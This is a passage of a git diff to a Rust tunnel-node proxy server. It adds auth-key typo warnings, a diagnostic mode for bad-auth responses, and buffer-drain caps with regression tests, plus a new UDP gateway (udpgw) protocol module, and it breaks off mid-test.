@@ -1146,14 +1486,14 @@ async fn handle_close(state: &AppState, sid: Option<String>) -> TunnelResponse {
         _ => return TunnelResponse::error("missing sid"),
     };
     if let Some(s) = state.sessions.lock().await.remove(&sid) {
-        s.reader_handle.abort();
+        s.abort_all();
         tracing::info!("session {} closed by client", sid);
     }
     if let Some(s) = state.udp_sessions.lock().await.remove(&sid) {
         s.reader_handle.abort();
         tracing::info!("udp session {} closed by client", sid);
     }
-    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(true), e: None, code: None }
+    TunnelResponse { sid: Some(sid), d: None, pkts: None, eof: Some(true), e: None, code: None, seq: None }
 }
 
 // ---------------------------------------------------------------------------
@@ -1234,7 +1574,24 @@ async fn main() {
         .init();
 
     let auth_key = std::env::var("TUNNEL_AUTH_KEY").unwrap_or_else(|_| {
-        tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)");
+        // Catch the recurring `MHRV_AUTH_KEY` typo (#391, #444). Several old
+        // copy-paste guides used `MHRV_AUTH_KEY` for the docker run; tunnel-node
+        // never read that name and silently fell through to `changeme`,
+        // producing baffling AUTH_KEY-mismatch decoys on the client. If
+        // `MHRV_AUTH_KEY` is set, point at it specifically so the user sees
+        // why their value isn't taking effect.
+        if std::env::var("MHRV_AUTH_KEY").is_ok() {
+            tracing::warn!(
+                "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — \
+                 tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with \
+                 underscores). Rename your env var: \
+                 `docker run ... -e TUNNEL_AUTH_KEY=<your-secret>`. Falling \
+                 back to default `changeme` for now (INSECURE — clients will \
+                 fail with AUTH_KEY mismatch decoys until this is fixed)."
+            );
+        } else {
+            tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)");
+        }
         "changeme".into()
     });
     let port: u16 = std::env::var("PORT")
@@ -1248,7 +1605,25 @@ async fn main() {
         Arc::new(Mutex::new(HashMap::new()));
     tokio::spawn(cleanup_task(sessions.clone(), udp_sessions.clone()));
 
-    let state = AppState { sessions, udp_sessions, auth_key };
+    // MHRV_DIAGNOSTIC=1 in env restores verbose JSON error responses on
+    // bad auth (instead of the nginx-404 decoy). Use during setup so
+    // misconfigured clients see "unauthorized"; flip back off in prod.
+    let diagnostic_mode = std::env::var("MHRV_DIAGNOSTIC")
+        .map(|v| v == "1" || v.eq_ignore_ascii_case("true"))
+        .unwrap_or(false);
+    if diagnostic_mode {
+        tracing::warn!(
+            "MHRV_DIAGNOSTIC=1 — bad-auth responses are verbose JSON \
+             errors instead of the production nginx-404 decoy. Disable \
+             before exposing this tunnel-node to the public internet."
+        );
+    }
+    let state = AppState {
+        sessions,
+        udp_sessions,
+        auth_key: Arc::from(auth_key),
+        diagnostic_mode,
+    };
 
     let app = Router::new()
         .route("/tunnel", post(handle_tunnel))
@@ -1283,6 +1658,10 @@ mod tests {
             sessions: Arc::new(Mutex::new(HashMap::new())),
             udp_sessions: Arc::new(Mutex::new(HashMap::new())),
             auth_key: "test-key".into(),
+            // Tests assert against the JSON `unauthorized` body shape
+            // (see e.g. `bad_auth_returns_unauthorized`), so they need
+            // diagnostic_mode enabled. Production default is false.
+            diagnostic_mode: true,
         }
     }
 
@@ -1430,14 +1809,100 @@ mod tests {
         let (_reader, writer) = client.into_split();
 
         Arc::new(SessionInner {
-            writer: Mutex::new(writer),
+            writer: Mutex::new(SessionWriter::Tcp(writer)),
             read_buf: Mutex::new(Vec::new()),
             eof: AtomicBool::new(false),
             last_active: Mutex::new(Instant::now()),
             notify: Notify::new(),
+            next_write_seq: Mutex::new(None),
+            pending_writes: Mutex::new(std::collections::BTreeMap::new()),
         })
     }
 
+    #[tokio::test]
+    async fn drain_now_caps_at_tcp_drain_max_bytes() {
+        // Issue #460: a 1 Gbps VPS reader fills the buffer with tens of MiB
+        // between polls; drain_now used to take the lot, the JSON response
+        // exceeded Apps Script's body cap, and the client failed JSON parse.
+        // The cap leaves the tail in the buffer for the next drain.
+        let inner = fake_inner().await;
+        let oversized = TCP_DRAIN_MAX_BYTES + 4096;
+        inner.read_buf.lock().await.resize(oversized, 0xab);
+
+        let (first, eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(first.len(), TCP_DRAIN_MAX_BYTES);
+        assert!(!eof, "shouldn't propagate eof while buffer still has data");
+
+        // Tail remains for the next poll.
+        assert_eq!(inner.read_buf.lock().await.len(), 4096);
+
+        let (second, _) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(second.len(), 4096);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_respects_caller_budget_below_per_session_cap() {
+        // Issue #863: per-session TCP_DRAIN_MAX_BYTES alone wasn't enough
+        // because N sessions × 16 MiB summed past Apps Script's 50 MiB
+        // response ceiling. The batch loop now passes a remaining-budget
+        // cap; drain_now must honor `min(budget, TCP_DRAIN_MAX_BYTES)`,
+        // leaving the tail for the next poll exactly like the per-session
+        // cap path does.
+        let inner = fake_inner().await;
+        // 1 MiB buffered, but caller only has 256 KiB budget left.
+        inner
+            .read_buf
+            .lock()
+            .await
+            .resize(1024 * 1024, 0xcd);
+
+        let (drained, eof) = drain_now(&inner, 256 * 1024).await;
+        assert_eq!(drained.len(), 256 * 1024);
+        assert!(!eof, "tail still buffered, eof must wait");
+
+        // The remaining 768 KiB stays put for the next poll.
+        assert_eq!(inner.read_buf.lock().await.len(), 768 * 1024);
+
+        // Next call with full budget drains the rest.
+        let (rest, _) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(rest.len(), 768 * 1024);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_passes_through_when_under_cap() {
+        let inner = fake_inner().await;
+        inner.read_buf.lock().await.extend_from_slice(b"hello world");
+
+        let (data, eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(data, b"hello world");
+        assert!(!eof);
+        assert!(inner.read_buf.lock().await.is_empty());
+    }
+
+    #[tokio::test]
+    async fn drain_now_holds_eof_until_buffer_drained() {
+        // If upstream signals EOF while the buffer is still oversized, we
+        // must drain the head, leave the tail, and *not* set eof yet.
+        // Eof flips on the final drain that returns a sub-cap buffer.
+        let inner = fake_inner().await;
+        inner.eof.store(true, Ordering::Release);
+        inner
+            .read_buf
+            .lock()
+            .await
+            .resize(TCP_DRAIN_MAX_BYTES + 100, 0);
+
+        let (head, head_eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(head.len(), TCP_DRAIN_MAX_BYTES);
+        assert!(!head_eof, "premature eof would tear the session");
+
+        let (tail, tail_eof) = drain_now(&inner, usize::MAX).await;
+        assert_eq!(tail.len(), 100);
+        assert!(tail_eof, "eof finally flips when buffer is drained");
+    }
+
     #[tokio::test]
     async fn wait_for_any_drainable_returns_immediately_when_buffer_has_data() {
         let inner = fake_inner().await;
@@ -1597,11 +2062,13 @@ mod tests {
         let stream = TcpStream::connect(addr).await.unwrap();
         let (reader, writer) = stream.into_split();
         let inner = Arc::new(SessionInner {
-            writer: Mutex::new(writer),
+            writer: Mutex::new(SessionWriter::Tcp(writer)),
             read_buf: Mutex::new(Vec::new()),
             eof: AtomicBool::new(false),
             last_active: Mutex::new(Instant::now()),
             notify: Notify::new(),
+            next_write_seq: Mutex::new(None),
+            pending_writes: Mutex::new(std::collections::BTreeMap::new()),
         });
         let _reader_handle = tokio::spawn(reader_task(reader, inner.clone()));
 
@@ -1958,7 +2425,7 @@ mod tests {
         );
 
         // The `udp_drain_response` helper threads eof into `eof: Some(true)`.
-        let resp = udp_drain_response("zombie".into(), pkts, eof);
+        let resp = udp_drain_response("zombie".into(), pkts, eof, None);
         assert_eq!(resp.eof, Some(true));
         assert!(resp.pkts.is_none());
     }
@@ -1989,4 +2456,151 @@ mod tests {
         assert_eq!(r.len(), 1);
         assert_eq!(r[0]["eof"], serde_json::Value::Bool(true));
     }
+
+    /// Regression for the cleanup-correctness fix. Previously, the
+    /// batch handler reaped any session whose `inner.eof` atomic was
+    /// set, even when `drain_now` had withheld eof to keep tail bytes
+    /// buffered (i.e. the buffer exceeded `TCP_DRAIN_MAX_BYTES`).
+    /// Reaping aborted the reader_task and dropped the tail. Cleanup
+    /// is now driven off the drain's returned `eof`, so an over-cap
+    /// buffer + atomic eof keeps the session alive through the first
+    /// poll and only reaps on the drain that actually returns eof.
+    #[tokio::test]
+    async fn batch_keeps_over_cap_session_until_tail_is_drained() {
+        use axum::body::Bytes;
+        use axum::extract::State;
+
+        let state = fresh_state();
+        let inner = fake_inner().await;
+        // Prime an over-cap buffer + raw eof. drain_now will return
+        // TCP_DRAIN_MAX_BYTES bytes with eof=false; the previous
+        // cleanup would still reap because it read inner.eof directly.
+        inner
+            .read_buf
+            .lock()
+            .await
+            .resize(TCP_DRAIN_MAX_BYTES + 4096, 0u8);
+        inner.eof.store(true, Ordering::Release);
+
+        let sid = "over-cap-sid".to_string();
+        state.sessions.lock().await.insert(
+            sid.clone(),
+            ManagedSession {
+                inner: inner.clone(),
+                reader_handle: tokio::spawn(async {}),
+                udpgw_handle: None,
+            },
+        );
+
+        let body = serde_json::json!({
+            "k": "test-key",
+            "ops": [{"op": "data", "sid": &sid}]
+        })
+        .to_string();
+        let _resp = handle_batch(State(state.clone()), Bytes::from(body))
+            .await
+            .into_response();
+
+        // First poll: session must still be in the map, tail intact.
+        // The previous code reaped here and dropped the 4096 tail bytes.
+        {
+            let sessions = state.sessions.lock().await;
+            let s = sessions.get(&sid).expect(
+                "session removed despite tail bytes still buffered; \
+                 drain_now returned eof=false but cleanup ignored that \
+                 and read inner.eof directly",
+            );
+            let remaining = s.inner.read_buf.lock().await.len();
+            assert_eq!(remaining, 4096, "tail must be preserved for next drain");
+        }
+
+        // Second poll: drain_now sees buf.len() ≤ cap AND raw_eof,
+        // so returns eof=true. Cleanup runs and the session is reaped.
+        let body2 = serde_json::json!({
+            "k": "test-key",
+            "ops": [{"op": "data", "sid": &sid}]
+        })
+        .to_string();
+        let _resp2 = handle_batch(State(state.clone()), Bytes::from(body2))
+            .await
+            .into_response();
+
+        assert!(
+            !state.sessions.lock().await.contains_key(&sid),
+            "session should be reaped on the drain that returns eof=true",
+        );
+    }
+
+    /// Regression for the `tokio::join!` → `tokio::select!` mixed-drain
+    /// fix. Before the change, a TCP-ready / UDP-idle pure-poll batch
+    /// paid the full UDP `LONGPOLL_DEADLINE` (15 s) because the join
+    /// was conjunctive — both arms had to complete. Under select! the
+    /// TCP wake returns the response promptly even though UDP is
+    /// quiet. The bound is loose (1 s) on purpose: real elapsed is
+    /// in the millisecond range, but the prior bug would have
+    /// triggered the test timeout instead of the assert.
+    #[tokio::test]
+    async fn batch_tcp_ready_does_not_pay_udp_longpoll_deadline() {
+        use axum::body::Bytes;
+        use axum::extract::State;
+
+        let state = fresh_state();
+
+        // TCP session with bytes already buffered → immediately drainable.
+        let tcp_inner = fake_inner().await;
+        tcp_inner
+            .read_buf
+            .lock()
+            .await
+            .extend_from_slice(b"ready");
+        let tcp_sid = "tcp-sid".to_string();
+        state.sessions.lock().await.insert(
+            tcp_sid.clone(),
+            ManagedSession {
+                inner: tcp_inner,
+                reader_handle: tokio::spawn(async {}),
+                udpgw_handle: None,
+            },
+        );
+
+        // Idle UDP session — never wakes. Real upstream so udp_open
+        // succeeds; we just never send anything to it.
+        let udp_target = UdpSocket::bind(("127.0.0.1", 0)).await.unwrap();
+        let udp_port = udp_target.local_addr().unwrap().port();
+        let (udp_sid, _udp_inner) = handle_udp_open_phase1(
+            &state,
+            Some("127.0.0.1".into()),
+            Some(udp_port),
+            None,
+        )
+        .await
+        .expect("udp open");
+
+        // Pure-poll batch (no `d` payload) → had_writes_or_connects =
+        // false → deadline = LONGPOLL_DEADLINE (15 s). Under the
+        // previous tokio::join! wait, the UDP arm would have held the
+        // response open for the full window even though TCP was
+        // already drainable.
+        let body = serde_json::json!({
+            "k": "test-key",
+            "ops": [
+                {"op": "data", "sid": &tcp_sid},
+                {"op": "udp_data", "sid": &udp_sid},
+            ]
+        })
+        .to_string();
+
+        let t0 = Instant::now();
+        let _resp = handle_batch(State(state.clone()), Bytes::from(body))
+            .await
+            .into_response();
+        let elapsed = t0.elapsed();
+
+        assert!(
+            elapsed < Duration::from_secs(1),
+            "TCP-ready / UDP-idle pure-poll batch must not pay \
+             LONGPOLL_DEADLINE; elapsed={:?}",
+            elapsed,
+        );
+    }
 }
diff --git a/tunnel-node/src/udpgw.rs b/tunnel-node/src/udpgw.rs
new file mode 100644
index 00000000..6e9a0b31
--- /dev/null
+++ b/tunnel-node/src/udpgw.rs
@@ -0,0 +1,566 @@
+//! Native implementation of the tun2proxy udpgw wire protocol.
+//!
+//! Wire format (all fields big-endian):
+//! ```text
+//! +-----+-------+---------+------+----------+----------+----------+
+//! | LEN | FLAGS | CONN_ID | ATYP | DST.ADDR | DST.PORT |   DATA   |
+//! +-----+-------+---------+------+----------+----------+----------+
+//! |  2  |   1   |    2    |  1   | Variable |    2     | Variable |
+//! +-----+-------+---------+------+----------+----------+----------+
+//! ```
+//!
+//! Flags: KEEPALIVE=0x01, DATA=0x02, ERR=0x20
+//! ATYP: 0x01=IPv4(4B), 0x03=Domain(1B len + name), 0x04=IPv6(16B)
+
+use std::net::{Ipv4Addr, Ipv6Addr, SocketAddr, SocketAddrV4, SocketAddrV6};
+use std::sync::Arc;
+
+use tokio::io::{AsyncReadExt, AsyncWriteExt, DuplexStream};
+use tokio::net::UdpSocket;
+
+/// Magic address that the client connects to via the tunnel protocol.
+/// `192.0.2.0/24` is reserved for documentation (RFC 5737 TEST-NET-1)
+/// and will never be a real destination.
+///
+/// Must NOT live in `198.18.0.0/15`: tun2proxy's `--dns virtual` allocator
+/// (used by the Android client in Full mode) synthesises fake IPs in that
+/// range for hostname lookups. If the magic IP collided with one of those
+/// synthetic IPs, every request to whichever hostname got that allocation
+/// would be silently mis-routed into the udpgw path. See issue #251.
+pub const UDPGW_MAGIC_IP: [u8; 4] = [192, 0, 2, 1];
+/// Pre-formatted dotted-quad form of `UDPGW_MAGIC_IP`. Compared against
+/// incoming hostnames in [`is_udpgw_dest`]; kept in sync with the octets
+/// above by the `magic_host_matches_octets` test.
+pub const UDPGW_MAGIC_HOST: &str = "192.0.2.1";
+pub const UDPGW_MAGIC_PORT: u16 = 7300;
+
+/// Pre-#251 magic IP — still recognised by `is_udpgw_dest` for one
+/// deprecation cycle so users who upgrade the `mhrv-tunnel` Docker
+/// container ahead of the Android APK don't lose Full-mode UDP relay
+/// during the version-skew window. Slated for removal in v1.10.0.
+const LEGACY_UDPGW_MAGIC_IP: [u8; 4] = [198, 18, 0, 1];
+const LEGACY_UDPGW_MAGIC_HOST: &str = "198.18.0.1";
+
+const FLAG_KEEPALIVE: u8 = 0x01;
+const FLAG_DATA: u8 = 0x02;
+const FLAG_ERR: u8 = 0x20;
+
+const ATYP_IPV4: u8 = 0x01;
+const ATYP_DOMAIN: u8 = 0x03;
+const ATYP_IPV6: u8 = 0x04;
+
+/// Maximum UDP payload we'll handle.
+const UDP_MTU: usize = 10240;
+
+// -------------------------------------------------------------------------
+// Frame types
+// -------------------------------------------------------------------------
+
+#[derive(Debug, Clone)]
+enum DstAddr {
+    V4(Ipv4Addr, u16),
+    V6(Ipv6Addr, u16),
+    Domain(String, u16),
+}
+
+impl DstAddr {
+    fn to_socket_addr(&self) -> std::io::Result<SocketAddr> {
+        match self {
+            DstAddr::V4(ip, port) => Ok(SocketAddr::V4(SocketAddrV4::new(*ip, *port))),
+            DstAddr::V6(ip, port) => Ok(SocketAddr::V6(SocketAddrV6::new(*ip, *port, 0, 0))),
+            DstAddr::Domain(name, port) => {
+                use std::net::ToSocketAddrs;
+                (name.as_str(), *port)
+                    .to_socket_addrs()?
+                    .next()
+                    .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::AddrNotAvailable, "DNS resolution failed"))
+            }
+        }
+    }
+
+    /// Serialise into SOCKS5 address format: ATYP + addr + port.
+    fn write_to(&self, buf: &mut Vec<u8>) {
+        match self {
+            DstAddr::V4(ip, port) => {
+                buf.push(ATYP_IPV4);
+                buf.extend_from_slice(&ip.octets());
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+            DstAddr::V6(ip, port) => {
+                buf.push(ATYP_IPV6);
+                buf.extend_from_slice(&ip.octets());
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+            DstAddr::Domain(name, port) => {
+                buf.push(ATYP_DOMAIN);
+                buf.push(name.len() as u8);
+                buf.extend_from_slice(name.as_bytes());
+                buf.extend_from_slice(&port.to_be_bytes());
+            }
+        }
+    }
+
+    fn serialised_len(&self) -> usize {
+        match self {
+            DstAddr::V4(..) => 1 + 4 + 2,       // ATYP + IPv4 + port
+            DstAddr::V6(..) => 1 + 16 + 2,       // ATYP + IPv6 + port
+            DstAddr::Domain(n, _) => 1 + 1 + n.len() + 2, // ATYP + len + name + port
+        }
+    }
+}
+
+#[derive(Debug)]
+struct Frame {
+    flags: u8,
+    conn_id: u16,
+    addr: Option<DstAddr>,
+    payload: Vec<u8>,
+}
+
+// -------------------------------------------------------------------------
+// Parse / serialise
+// -------------------------------------------------------------------------
+
+/// Try to parse one frame from `buf`. Returns `(frame, bytes_consumed)` or
+/// `None` if the buffer doesn't contain a complete frame yet.
+fn try_parse_frame(buf: &[u8]) -> Result<Option<(Frame, usize)>, std::io::Error> {
+    if buf.len() < 2 {
+        return Ok(None);
+    }
+    let body_len = u16::from_be_bytes([buf[0], buf[1]]) as usize;
+    let total = 2 + body_len;
+    if buf.len() < total {
+        return Ok(None);
+    }
+
+    let body = &buf[2..total];
+    if body.len() < 3 {
+        return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "frame too short"));
+    }
+    let flags = body[0];
+    let conn_id = u16::from_be_bytes([body[1], body[2]]);
+    let rest = &body[3..];
+
+    let (addr, payload_start) = if flags & FLAG_DATA != 0 {
+        // Parse SOCKS5-style address.
+        if rest.is_empty() {
+            return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "missing ATYP"));
+        }
+        let atyp = rest[0];
+        match atyp {
+            ATYP_IPV4 => {
+                if rest.len() < 1 + 4 + 2 {
+                    return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv4 addr"));
+                }
+                let ip = Ipv4Addr::new(rest[1], rest[2], rest[3], rest[4]);
+                let port = u16::from_be_bytes([rest[5], rest[6]]);
+                (Some(DstAddr::V4(ip, port)), 7)
+            }
+            ATYP_IPV6 => {
+                if rest.len() < 1 + 16 + 2 {
+                    return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv6 addr"));
+                }
+                let mut octets = [0u8; 16];
+                octets.copy_from_slice(&rest[1..17]);
+                let ip = Ipv6Addr::from(octets);
+                let port = u16::from_be_bytes([rest[17], rest[18]]);
+                (Some(DstAddr::V6(ip, port)), 19)
+            }
+            ATYP_DOMAIN => {
+                if rest.len() < 2 {
+                    return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr"));
+                }
+                let dlen = rest[1] as usize;
+                if rest.len() < 2 + dlen + 2 {
+                    return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short domain addr"));
+                }
+                let name = String::from_utf8_lossy(&rest[2..2 + dlen]).into_owned();
+                let port = u16::from_be_bytes([rest[2 + dlen], rest[3 + dlen]]);
+                (Some(DstAddr::Domain(name, port)), 2 + dlen + 2)
+            }
+            _ => {
+                return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, format!("unknown ATYP 0x{:02x}", atyp)));
+            }
+        }
+    } else {
+        (None, 0)
+    };
+
+    let payload = rest[payload_start..].to_vec();
+
+    Ok(Some((Frame { flags, conn_id, addr, payload }, total)))
+}
+
+fn serialise_frame(frame: &Frame) -> Vec<u8> {
+    // Body = flags(1) + conn_id(2) + [addr] + payload
+    let addr_len = frame.addr.as_ref().map_or(0, |a| a.serialised_len());
+    let body_len = 1 + 2 + addr_len + frame.payload.len();
+
+    let mut buf = Vec::with_capacity(2 + body_len);
+    buf.extend_from_slice(&(body_len as u16).to_be_bytes());
+    buf.push(frame.flags);
+    buf.extend_from_slice(&frame.conn_id.to_be_bytes());
+    if let Some(ref addr) = frame.addr {
+        addr.write_to(&mut buf);
+    }
+    buf.extend_from_slice(&frame.payload);
+    buf
+}
+
+// -------------------------------------------------------------------------
+// Public API
+// -------------------------------------------------------------------------
+
+/// Returns `true` if the connect destination is the magic udpgw address.
+///
+/// Accepts both the current `UDPGW_MAGIC_HOST` (`192.0.2.1`) and the legacy
+/// `LEGACY_UDPGW_MAGIC_HOST` (`198.18.0.1`) so a v1.9.25+ tunnel-node still
+/// works with pre-#251 Android clients during the upgrade window.
+pub fn is_udpgw_dest(host: &str, port: u16) -> bool {
+    port == UDPGW_MAGIC_PORT && (host == UDPGW_MAGIC_HOST || host == LEGACY_UDPGW_MAGIC_HOST)
+}
+
+/// Per-conn_id persistent UDP socket with a background reader that
+/// continuously receives datagrams and queues response frames.
+struct ConnSocket {
+    sock: Arc<UdpSocket>,
+    _reader: tokio::task::AbortHandle,
+}
+
+/// Run the udpgw server over a duplex stream. Reads udpgw frames from the
+/// client half, sends real UDP datagrams, and writes response frames back.
+/// Maintains persistent sockets per conn_id so Telegram VoIP (which expects
+/// a stable source port) works correctly.
+pub async fn udpgw_server_task(stream: DuplexStream) {
+    let (tx, mut rx) = tokio::sync::mpsc::channel::<Vec<u8>>(256);
+
+    // Writer task: drains response channel → duplex stream.
+    let mut read_half = {
+        let (read_half, write_half) = tokio::io::split(stream);
+        tokio::spawn(async move {
+            let mut w = write_half;
+            while let Some(data) = rx.recv().await {
+                if w.write_all(&data).await.is_err() {
+                    break;
+                }
+                let _ = w.flush().await;
+            }
+        });
+        read_half
+    };
+
+    // Persistent sockets keyed by (conn_id, dest_addr).
+    let mut sockets: std::collections::HashMap<(u16, SocketAddr), ConnSocket> = std::collections::HashMap::new();
+
+    let mut buf = Vec::with_capacity(65536);
+    let mut tmp = [0u8; 65536];
+
+    loop {
+        let n = match read_half.read(&mut tmp).await {
+            Ok(0) | Err(_) => break,
+            Ok(n) => n,
+        };
+        buf.extend_from_slice(&tmp[..n]);
+
+        loop {
+            match try_parse_frame(&buf) {
+                Ok(Some((frame, consumed))) => {
+                    buf.drain(..consumed);
+                    handle_frame(&frame, &tx, &mut sockets).await;
+                }
+                Ok(None) => break,
+                Err(e) => {
+                    tracing::warn!("udpgw frame parse error: {}", e);
+                    if buf.len() >= 2 {
+                        let skip = 2 + u16::from_be_bytes([buf[0], buf[1]]) as usize;
+                        buf.drain(..skip.min(buf.len()));
+                    } else {
+                        buf.clear();
+                    }
+                    break;
+                }
+            }
+        }
+    }
+
+    // AbortHandle::drop aborts each reader task automatically.
+    drop(sockets);
+    tracing::debug!("udpgw session ended");
+}
+
+/// Get or create a persistent UDP socket for this (conn_id, dest_addr) pair.
+/// A background reader task continuously receives datagrams and queues
+/// response frames — no per-packet timeout needed.
+async fn get_or_create_socket(
+    conn_id: u16,
+    dst: &SocketAddr,
+    addr: &DstAddr,
+    tx: &tokio::sync::mpsc::Sender<Vec<u8>>,
+    sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>,
+) -> Option<Arc<UdpSocket>> {
+    let key = (conn_id, *dst);
+    if let Some(cs) = sockets.get(&key) {
+        return Some(cs.sock.clone());
+    }
+
+    let bind_addr: SocketAddr = if dst.is_ipv6() {
+        "[::]:0".parse().unwrap()
+    } else {
+        "0.0.0.0:0".parse().unwrap()
+    };
+    let sock = match UdpSocket::bind(bind_addr).await {
+        Ok(s) => Arc::new(s),
+        Err(e) => {
+            tracing::debug!("udpgw bind failed: {}", e);
+            return None;
+        }
+    };
+    if let Err(e) = sock.connect(dst).await {
+        tracing::debug!("udpgw connect {} failed: {}", dst, e);
+        return None;
+    }
+
+    // Spawn continuous reader for this socket.
+    let sock_clone = sock.clone();
+    let tx_clone = tx.clone();
+    let addr_clone = addr.clone();
+    let reader = tokio::spawn(async move {
+        let mut recv_buf = vec![0u8; UDP_MTU];
+        loop {
+            match sock_clone.recv(&mut recv_buf).await {
+                Ok(n) => {
+                    let resp = serialise_frame(&Frame {
+                        flags: FLAG_DATA,
+                        conn_id,
+                        addr: Some(addr_clone.clone()),
+                        payload: recv_buf[..n].to_vec(),
+                    });
+                    if tx_clone.send(resp).await.is_err() {
+                        break;
+                    }
+                }
+                Err(_) => break,
+            }
+        }
+    });
+
+    sockets.insert(key, ConnSocket { sock: sock.clone(), _reader: reader.abort_handle() });
+    Some(sock)
+}
+
+async fn handle_frame(
+    frame: &Frame,
+    tx: &tokio::sync::mpsc::Sender<Vec<u8>>,
+    sockets: &mut std::collections::HashMap<(u16, SocketAddr), ConnSocket>,
+) {
+    if frame.flags & FLAG_KEEPALIVE != 0 {
+        let resp = serialise_frame(&Frame {
+            flags: FLAG_KEEPALIVE,
+            conn_id: frame.conn_id,
+            addr: None,
+            payload: vec![],
+        });
+        let _ = tx.send(resp).await;
+        return;
+    }
+
+    if frame.flags & FLAG_DATA == 0 {
+        return;
+    }
+
+    let Some(ref dst) = frame.addr else {
+        let _ = tx.send(serialise_err(frame.conn_id)).await;
+        return;
+    };
+
+    // Block QUIC (UDP 443) and DNS (UDP 53) from udpgw:
+    // - QUIC: forces browsers to fall back to TCP/HTTP2 which is much
+    //   faster through the batch tunnel pipeline.
+    // - DNS: let tun2proxy's virtual DNS / SOCKS5 UDP associate handle
+    //   it instead — more reliable on the per-session path.
+    // VoIP (Telegram, Meet) still flows through udpgw normally.
+    let dst_port = match dst {
+        DstAddr::V4(_, p) | DstAddr::V6(_, p) | DstAddr::Domain(_, p) => *p,
+    };
+    if dst_port == 443 || dst_port == 53 {
+        let _ = tx.send(serialise_err(frame.conn_id)).await;
+        return;
+    }
+
+    let dst_addr = match dst.to_socket_addr() {
+        Ok(a) => a,
+        Err(e) => {
+            tracing::debug!("udpgw resolve failed: {}", e);
+            let _ = tx.send(serialise_err(frame.conn_id)).await;
+            return;
+        }
+    };
+
+    let Some(sock) = get_or_create_socket(frame.conn_id, &dst_addr, dst, tx, sockets).await else {
+        let _ = tx.send(serialise_err(frame.conn_id)).await;
+        return;
+    };
+
+    // Send the datagram. Response comes asynchronously via the reader task.
+    if let Err(e) = sock.send(&frame.payload).await {
+        tracing::debug!("udpgw send to {} failed: {}", dst_addr, e);
+        let _ = tx.send(serialise_err(frame.conn_id)).await;
+    }
+}
+
+fn serialise_err(conn_id: u16) -> Vec<u8> {
+    serialise_frame(&Frame {
+        flags: FLAG_ERR,
+        conn_id,
+        addr: None,
+        payload: vec![],
+    })
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn keepalive_round_trip() {
+        let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 42, addr: None, payload: vec![] };
+        let bytes = serialise_frame(&frame);
+        let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap();
+        assert_eq!(consumed, bytes.len());
+        assert_eq!(parsed.flags, FLAG_KEEPALIVE);
+        assert_eq!(parsed.conn_id, 42);
+        assert!(parsed.addr.is_none());
+        assert!(parsed.payload.is_empty());
+    }
+
+    #[test]
+    fn data_ipv4_round_trip() {
+        let frame = Frame {
+            flags: FLAG_DATA,
+            conn_id: 7,
+            addr: Some(DstAddr::V4(Ipv4Addr::new(8, 8, 8, 8), 53)),
+            payload: vec![1, 2, 3, 4],
+        };
+        let bytes = serialise_frame(&frame);
+        let (parsed, consumed) = try_parse_frame(&bytes).unwrap().unwrap();
+        assert_eq!(consumed, bytes.len());
+        assert_eq!(parsed.flags, FLAG_DATA);
+        assert_eq!(parsed.conn_id, 7);
+        assert_eq!(parsed.payload, vec![1, 2, 3, 4]);
+        match parsed.addr.unwrap() {
+            DstAddr::V4(ip, port) => {
+                assert_eq!(ip, Ipv4Addr::new(8, 8, 8, 8));
+                assert_eq!(port, 53);
+            }
+            _ => panic!("expected IPv4"),
+        }
+    }
+
+    #[test]
+    fn data_ipv6_round_trip() {
+        let frame = Frame {
+            flags: FLAG_DATA,
+            conn_id: 100,
+            addr: Some(DstAddr::V6(Ipv6Addr::LOCALHOST, 443)),
+            payload: b"hello".to_vec(),
+        };
+        let bytes = serialise_frame(&frame);
+        let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap();
+        assert_eq!(parsed.conn_id, 100);
+        match parsed.addr.unwrap() {
+            DstAddr::V6(ip, port) => {
+                assert_eq!(ip, Ipv6Addr::LOCALHOST);
+                assert_eq!(port, 443);
+            }
+            _ => panic!("expected IPv6"),
+        }
+    }
+
+    #[test]
+    fn data_domain_round_trip() {
+        let frame = Frame {
+            flags: FLAG_DATA,
+            conn_id: 5,
+            addr: Some(DstAddr::Domain("example.com".into(), 80)),
+            payload: b"GET /".to_vec(),
+        };
+        let bytes = serialise_frame(&frame);
+        let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap();
+        match parsed.addr.unwrap() {
+            DstAddr::Domain(name, port) => {
+                assert_eq!(name, "example.com");
+                assert_eq!(port, 80);
+            }
+            _ => panic!("expected Domain"),
+        }
+    }
+
+    #[test]
+    fn err_frame_round_trip() {
+        let bytes = serialise_err(99);
+        let (parsed, _) = try_parse_frame(&bytes).unwrap().unwrap();
+        assert_eq!(parsed.flags, FLAG_ERR);
+        assert_eq!(parsed.conn_id, 99);
+    }
+
+    #[test]
+    fn partial_frame_returns_none() {
+        let frame = Frame { flags: FLAG_KEEPALIVE, conn_id: 1, addr: None, payload: vec![] };
+        let bytes = serialise_frame(&frame);
+        // Give it only half the bytes.
+        assert!(try_parse_frame(&bytes[..bytes.len() / 2]).unwrap().is_none());
+    }
+
+    #[test]
+    fn two_frames_in_buffer() {
